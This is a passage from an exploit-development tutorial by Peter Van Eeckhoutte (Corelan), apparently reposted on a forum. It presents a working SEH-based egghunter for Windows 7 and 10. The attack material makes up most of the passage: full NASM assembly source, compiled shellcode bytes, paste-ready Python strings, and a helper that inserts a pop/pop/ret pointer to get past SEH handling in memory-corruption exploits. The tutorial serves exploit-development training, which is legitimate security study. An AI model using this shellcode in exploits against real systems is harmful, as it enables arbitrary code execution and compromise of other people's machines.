Of course, we should be careful and take the consequences and effects of running the exception handling mechanism into account:

The exception handling mechanism will change the value of ESP. It will create an "exception dispatcher stack" frame at the new ESP location, with a pointer to the originating SEH frame at ESP+8. We'll have to "undo" this change to ESP, to make sure it points back to the area on the stack where the egghunter is storing its data.

Next, we should avoid creating new records all the time. Instead, we should try to reuse the same record over and over again, so we don't keep pushing data onto the stack and eventually run out of stack space.

Additionally, of course, the egghunter needs to be able to run from any location in memory.

Finally, whatever we put as "SE Handler" (the second field of the record) has to be SafeSEH compatible. Unfortunately, that is the weak spot of my "solution".
Additionally, my routine won’t work if SEHOP is active. (but that’s not active by default on client systems IIRC) Creating our own custom SEH record means that we’re going to be writing something to the stack, overwriting/damaging what is already there. So, if your egghunter/shellcode is also on the stack around that location, you may want to adjust ESP before running the egghunter. Just sayin’ This is what my SEH based egghunter looks like (ready to compile with nasm): ; Universal SEH based egg hunter (x86 and wow64) ; tested on Windows 7 & Windows 10 ; written by Peter Van Eeckhoutte (corelanc0d3r) ; www.corelan.be - www.corelan-training.com - www.corelan-consulting.com ; ; warning: will damage stack around ESP ; ; usage: find a non-safeseh protected pointer to pop/pop/ret and put it in the placeholder below ; [BITS 32] CALL $+4 ; getPC routine RET POP ECX ADD ECX,0x1d ; offset to "handle" routine ;set up SEH record XOR EBX,EBX PUSH ECX ; remember where our 'custom' SE Handler routine will be PUSH ECX ; p/p/r will fly over this one PUSH 0x90c3585c ; trigger p/p/r again :) PUSH 0x44444444 ; Replace with P/P/R address ** PLACEHOLDER ** PUSH 0x04EB5858 ; SHORT JUMP MOV DWORD [FS:EBX],ESP ; put our SEH record to top of chain JMP nextpage handle: ; our custom handle SUB ESP,0x14 ; undo changes to ESP XOR EBX,EBX MOV DWORD [FS:EBX],ESP ; make our SEH record topmost again MOV EDX, [ESP-4] ; pick up saved EDX INC EDX nextpage: OR DX, 0x0FFF INC EDX MOV [ESP-4], EDX ; remember where we are searching MOV EAX, 0x74303077 ; w00t MOV EDI, EDX SCASD JNZ nextpage+5 SCASD JNZ nextpage+5 JMP EDI Let’s look at the various components of the egg hunter. First, the hunter starts with a “GetPC” routine (designed to find it’s own absolute address in memory), followed by an instruction that adds 0x1d bytes to the address it was able to retrieve using that GetPC routine. After adding this offset, ECX will contain the absolute address where the actual “handler” routine will be in memory. (referenced by label “handle” in the code above). Keep in mind, the egghunter needs to be able to dynamically determine this location at runtime, because the egghunter will use the exception handler mechanism to come back to itself and continue running the egghunter. That means we’ll need to know (determine) where it is, store the reference on the stack, so we can “retrieve/jump” to it later during the exception handling mechanism. Next, the code is creating a new custom SEH record. Although a SEH record only takes 2 fields, the code is actually pushing 5 specially crafted values on the stack. Only the last 2 of them will become the SEH record, the other ones are used to allow the exception handler to restore ESP and continue execution of the egghunter. Let’s look at what gets pushed and why: PUSH ECX: this is the address where the “handle” routine is in memory, as determined by the GetPC routine earlier. The exception handler will need to eventually return to this one. PUSH ECX: we’re pushing the address again, but this one won’t be used. We’ll be using the pop/pop/ret pointer twice. The first time will be used for the exception handler to bring execution back to our code, the second time it will be used to return to the “ECX” stored on the stack. This second ECX is just there to compensate for the second POP in the p/p/r. You can push anything you like on the stack. PUSH 0x90c3585C: this code will get executed. It’s a POP ESP, POP EAX, RET. 
This will reset the stack back to the original location on the stack where we have stored the SEH record. The RET will transfer execution back to the p/p/r pointer on the stack (part of the SEH record). In other words, the p/p/r pointer will be used twice. The second time, it will eventually return to the address of ECX that was stored on the stack (see the previous PUSH ECX instructions).

Next, the real SEH record is created, by pushing 2 more values onto the stack:

Pointer to P/P/R (must be a non-SafeSEH protected pointer). We have to use a p/p/r because we can't make this handler field point directly into the stack (or heap). As we can't just make the exception mechanism go back directly to our code, we'll use the pop/pop/ret to maintain control over the execution flow. In the code above, you'll have to replace the 0x44444444 value with the address of a non-SafeSEH protected pop/pop/ret. Then, when an exception occurs (i.e. when the egghunter reaches a page that is not accessible), the pop/pop/ret will be triggered for the first time, returning to the 4 bytes in the first field of the SEH record.

In the first field of the SEH record, I have placed a sequence of 2 pops and a short jump forward. This will adjust the stack slightly, so the pointer to the SEH record ends up at the top of the stack. Next, it will jump to the instruction sequence that was pushed onto the stack earlier on (0x90C3585C). As explained, that sequence will trigger the POP/POP/RET again, which will eventually return to the stored ECX pointer (which is where the egghunter is).

To complete the creation of the SEH record and mark it as the topmost record, we simply write its location into the TEB. As our new custom SEH record currently sits at ESP, we can simply write the value of ESP into the TEB at offset 0 (MOV DWORD [FS:EBX],ESP). (That's why we cleared EBX in the first place.)

At this point, the egghunter is ready to test if a page is readable. The code uses EDX as the reference where to read from. The routine starts by going to the end of the page (OR DX, 0x0FFF), then moves to the start of the next page (INC EDX), and then stores the value of EDX on the stack (at [ESP-4]), so the exception handler is able to pick it up later on. If the read attempt (SCASD) fails, an access violation will be triggered. The access violation will use our custom SEH record (as it is supposed to be the topmost record), and that routine is designed to resume execution of the egghunter (by running the "handle" routine, which will eventually restore the EDX pointer from the stack and move on to the next page).

The "handle" routine will:

Adjust the stack again, correcting its position to put it where it is/should be when running the egghunter (SUB ESP,0x14).

Next, make sure our custom record is the topmost SEH record again (just anticipating the case where some other code would have added a new topmost record).

Finally, pick up the reference from the stack (where we stored the last address we've tried to access) and move on to the next page.

If a page is readable, the egghunter will check for the presence of the tag, twice. If the tags are found, the final "JMP EDI" will tell the CPU to run the code placed right after the double tag.

When debugging the egghunter, you'll notice that it'll throw access violations (when the code tries to access a page that is not accessible).
Of course, in this case, these access violations are absolutely normal, but you'll still have to pass the exceptions back to the application (Shift+F9). You can also configure Immunity Debugger to ignore (and pass) the exceptions automatically, by configuring the exceptions. To do so, click on 'debugging options', and open the 'exceptions' tab. Add the following hex values under "Add range":

0xC0000005 – ACCESS VIOLATION
0x80000001 – STATUS_GUARD_PAGE_VIOLATION

Of course, when you have finished debugging the egghunter, don't forget to remove these 2 exceptions again.

In order to use the egghunter, you'll need to convert the asm instructions into opcodes first. To do so, you'll need to install nasm (I have used the Win32 installer from https://www.nasm.us/pub/nasm/releasebuilds/2.14.02/win32/). Save the asm code snippet above into a text file (for instance "c:\dev\win10_egghunter_seh.nasm"). Next, run nasm to convert it into a binary file that contains the opcodes:

"C:\Program Files (x86)\NASM\nasm.exe" -o c:\dev\win10_egghunter_seh.obj c:\dev\win10_egghunter_seh.nasm

Next, dump the contents of the binary file to a hex format that you can use in your scripts and exploits:

python c:\dev\bin2hex.py c:\dev\win10_egghunter_seh.obj

(You can find a copy of the bin2hex.py script in Corelan's github repository.)

If all goes well, this is what you'll get:

"\xe8\xff\xff\xff\xff\xc3\x59\x83"
"\xc1\x1d\x31\xdb\x51\x51\x68\x5c"
"\x58\xc3\x90\x68\x44\x44\x44\x44"
"\x68\x58\x58\xeb\x04\x64\x89\x23"
"\xeb\x0d\x83\xec\x14\x31\xdb\x64"
"\x89\x23\x8b\x54\x24\xfc\x42\x66"
"\x81\xca\xff\x0f\x42\x89\x54\x24"
"\xfc\xb8\x77\x30\x30\x74\x89\xd7"
"\xaf\x75\xf1\xaf\x75\xee\xff\xe7"

Again, don't forget to replace the \x44\x44\x44\x44 (end of the third line) with the address of a pop/pop/ret (and to store the address in little endian, if you are editing the bytes).

Python friendly copy/paste code:

egghunter = ("\xe8\xff\xff\xff\xff\xc3\x59\x83"
"\xc1\x1d\x31\xdb\x51\x51\x68\x5c"
"\x58\xc3\x90\x68")
egghunter += "\x??\x??\x??\x??"  # replace with pointer to pop/pop/ret. Use !mona seh
egghunter += ("\x68\x58\x58\xeb\x04\x64\x89\x23"
"\xeb\x0d\x83\xec\x14\x31\xdb\x64"
"\x89\x23\x8b\x54\x24\xfc\x42\x66"
"\x81\xca\xff\x0f\x42\x89\x54\x24"
"\xfc\xb8\x77\x30\x30\x74\x89\xd7"
"\xaf\x75\xf1\xaf\x75\xee\xff\xe7")
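If you're building the exploit in Python anyway, you can let struct.pack handle the little-endian conversion instead of hand-editing the bytes. A small sketch of mine (the pop/pop/ret value below is a made-up placeholder; locate a real non-SafeSEH pointer, e.g. with !mona seh):

import struct

# The SEH-based egghunter from above, split around the p/p/r placeholder
hunter_head = ("\xe8\xff\xff\xff\xff\xc3\x59\x83"
               "\xc1\x1d\x31\xdb\x51\x51\x68\x5c"
               "\x58\xc3\x90\x68")
hunter_tail = ("\x68\x58\x58\xeb\x04\x64\x89\x23"
               "\xeb\x0d\x83\xec\x14\x31\xdb\x64"
               "\x89\x23\x8b\x54\x24\xfc\x42\x66"
               "\x81\xca\xff\x0f\x42\x89\x54\x24"
               "\xfc\xb8\x77\x30\x30\x74\x89\xd7"
               "\xaf\x75\xf1\xaf\x75\xee\xff\xe7")

ppr = 0x10011234  # hypothetical pop/pop/ret address, replace with your own
egghunter = hunter_head + struct.pack("<I", ppr) + hunter_tail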
If you’d like to take one of our Corelan classes, check our schedules at https://www.corelan-training.com/index.php/training-schedules. If you prefer to set up a class at your company or conference, don’t hesitate to contact me via this form. As explained at the start of the article: the trainings and consulting gigs are now my main form of income. I am only able to do research and publish information for free if I can make a living as well. This website is supported, hosted and funded by Corelan Consulting. The more classes I can teach and the more consulting I can do, the more time I can invest in research and publication of tutorials. Thanks! © 2019, Peter Van Eeckhoutte (corelanc0d3r). All rights reserved. Sursa: https://www.corelan.be/index.php/2019/04/23/windows-10-egghunter/
    1 point
This leaderboard is set to Bucharest/GMT+02:00